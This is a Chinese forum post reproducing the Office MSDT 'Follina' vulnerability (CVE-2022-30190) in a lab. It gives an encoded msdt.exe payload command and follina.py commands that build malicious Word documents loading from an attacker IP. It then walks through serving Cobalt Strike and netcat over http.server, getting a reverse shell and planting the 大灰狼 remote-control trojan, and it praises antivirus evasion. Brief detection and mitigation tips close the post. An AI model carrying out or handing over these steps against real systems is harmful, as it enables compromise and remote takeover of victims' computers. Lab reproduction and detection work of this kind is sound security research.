Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)复现

zhang3   ·   发表于 2022-06-12 12:56:54   ·   技术文章

漏洞概述

该漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ms-msdt URI执行任意PowerShell代码。

影响版本

目前已知影响的版本为:

  • office 2021 Lts
  • office 2019
  • office 2016
  • Office 2013
  • Office ProPlus
  • Office 365

    漏洞复现

    官方payload

    1. msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
    在cmd中运行即可弹出计算器:

    环境部署

    office下载地址:
    https://otp.landian.vip/zh-cn/download.html
    因为已经部署好了,简单截图说明一下:

    windows环境用了:

    环境说明:

    攻击机ip:192.168.84.205
    目标靶机ip:192.168.84.185

    使用poc1:

    下载地址:
    https://github.com/chvancooten/follina.py
    在攻击机执行:
    python3 .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 192.168.84.205
    生成恶意docx文档:

    将clickme.docx放在靶机打开:

    这里远程加载恶意文件,生活中遇到这种情况可以警惕了。
    程序错误诊断,然后弹出计算器:

    攻击机可以看到远程加载请求:

    复现成功。
    我们肯定不满足于弹出计算器,如何深度利用获取权限呢?

    使用poc2

    poc1的命令执行没看懂。
    下载地址:
    https://github.com/JohnHammond/msdt-follina

    CS上线

    在cs上生成木马,这个不用多说。
    创建pocexe文件夹,将nc,cs木马放进去,并在该目录下开启简单的http.server服务:

    开启服务:
    python -m http.server 8080

    改poc(follina.py)文件下载路径:

    生成恶意文档:
    python follina.py -i 192.168.84.205 -p 8000 -r 5555 #-r为反弹shell的端口,这里暂时用不到

    将生成的follina.doc放在靶机打开:

    看到cs上线:

    查看进程:

    文件存在:

    nc反弹shell:

    改poc配置:

    执行命令:
    python follina.py -i 192.168.84.205 -p 8000 -r 5555 #这里用到了 -r 反弹shell

    将生成得doc文档放在靶机执行:

    反弹shell成功:

    看到nc运行:

    大灰狼远控

    用了7.5的版本,9.5的版本在虚拟机运行报错,大半天都没解决。
    生成木马:

    系统设置,配置监听端口:

    然后与上面的两种方式一样,加载大灰狼木马

    目标机运行:

    上线:

    免杀做好,还是比较强大的:

    简单分析

    将doc文件后缀改为zip:


    解压:

    可以根据这个ip溯源反制。
    检测的思路:
    1. cmd/msedge/office这些进程诞生的msdt.exe进程是可疑的。
    2. msdt.exe里参数带有/../../xxxx/.exe,恶意payload 直接检测这个也是可以的。

    修复建议

    以管理员身份运行命令提示符,执行以下两条命令:
    1. reg export HKEY_CLASSES_ROOT\ms-msdt filename
    2. reg delete HKEY_CLASSES_ROOT\ms-msdt /f
    撤消解决方法:
    1. reg import filename

    总结

    对大佬们的文章进行了资源整合。这里仅作线下学习,如有违法行为,与本人无关。

    参考文章

    https://blog.csdn.net/weixin_45329947/article/details/125089243
    https://www.cnblogs.com/bonelee/p/16337291.html
用户名金币积分时间理由
F0re4t 4.00 0 2022-06-14 19:07:28 一个受益终生的帖子~~
君叹 4.00 0 2022-06-14 10:10:44 一个受益终生的帖子~~
Track-劲夫 100.00 0 2022-06-13 19:07:56 一个受益终生的帖子~~

打赏我,让我更有动力~

1 条回复   |  直到 2022-6-14 | 1492 次浏览

君叹
发表于 2022-6-14

爱了爱了

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.